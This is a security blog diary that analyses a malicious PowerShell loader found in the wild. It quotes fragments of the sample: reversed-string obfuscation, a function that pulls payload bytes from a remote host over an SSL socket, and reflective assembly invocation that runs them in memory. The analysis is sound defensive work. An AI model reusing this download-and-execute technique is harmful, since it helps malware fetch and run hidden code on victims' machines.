PowerShell Sample Extracting Payload From SSL

Published: 2020-04-10
Last Updated: 2020-04-10 09:32:46 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Another diary, another technique to fetch a malicious payload and execute it on the victim host. I spotted this piece of Powershell code this morning while reviewing my hunting results. It implements a very interesting technique. As usual, all the code snippets below have been beautified.

First, it implements a function to reverse obfuscated strings:

function Rev($s) {
    $s = $s.ToCharArray(); 
    $s = -join($s); 
    return $s; 

Here is an example:

Rev('maertSlsS.ytiruceS.teN') = 'SslStream.Security.Net'

Easy! The core of the script implements a classic injection via 'System.Reflection.Assembly'[1]

$data1=Get-File $ldr;
$data2=Get-File $guid;
$m1=Rev 'epyTteG';      # GetType
$m2=Rev 'dohteMteG';    # GetMethod
$m3=Rev 'ekovnI';       # Invoke
[byte[][]] $Params=@(,$data2);
$ldr.($m3)($null,$Params) | Out-Null;
;while($true){sleep 5}

You can see two calls to a Get-File() function. From where are these payload downloaded? Let's have a look at the function:

    if($crt -eq $null) {
        return $false
    $h=New-Object -TypeName Security.Cryptography.SHA256Managed;
    $result=([string]::Compare($hs, $thumb, $true) -eq 0);
    return $result;

function Read-Data($ssl, $a)
    $b=New-Object Byte[] $a;
    while($r -gt 0)
        if($i -le 0){exit}
    return ,$b;

function Get-File($val)
    $t1=Rev 'tneilCpcT.stekcoS.teN';     # TcpClient.Sockets.Net
    $t2=Rev 'maertSlsS.ytiruceS.teN';    # SslStream.Security.Net
    $m=Rev 'tneilCsAetacitnehtuA';       # AuthenticateAsClient
    $c=New-Object $t1 $addr, $port;
    $ssl=New-Object $t2 $c.GetStream(), false, $cc;
    $aac=New-Object String 0;
    $bf=Read-Data $ssl 4;
    $ret=Read-Data $ssl $a;
    return ,$ret;

As you can see the SslStream.AuthenticateAsClient method[2] is used. Data returned in the SSL connection is dumped into the variable. Here are the details (IOCs):


Unfortunately, I was not able to reach the IP address to fetch the certificate/payload. Server down or restricted connectivity from specific locations? I'm keeping an eye on the server and hope to fetch more data if it comes back online.

It's a Microsoft Azure host. I found this certificate information on PassiveTotal:

If you're interested in playing with Powershell and certificates, Rob already published a diary[3] a long time ago about this topic.

[1] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly
[2] https://docs.microsoft.com/en-us/dotnet/api/system.net.security.sslstream.authenticateasclient
[3] https://isc.sans.edu/forums/diary/Assessing+Remote+Certificates+with+Powershell/20645/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

0 comment(s)


Diary Archives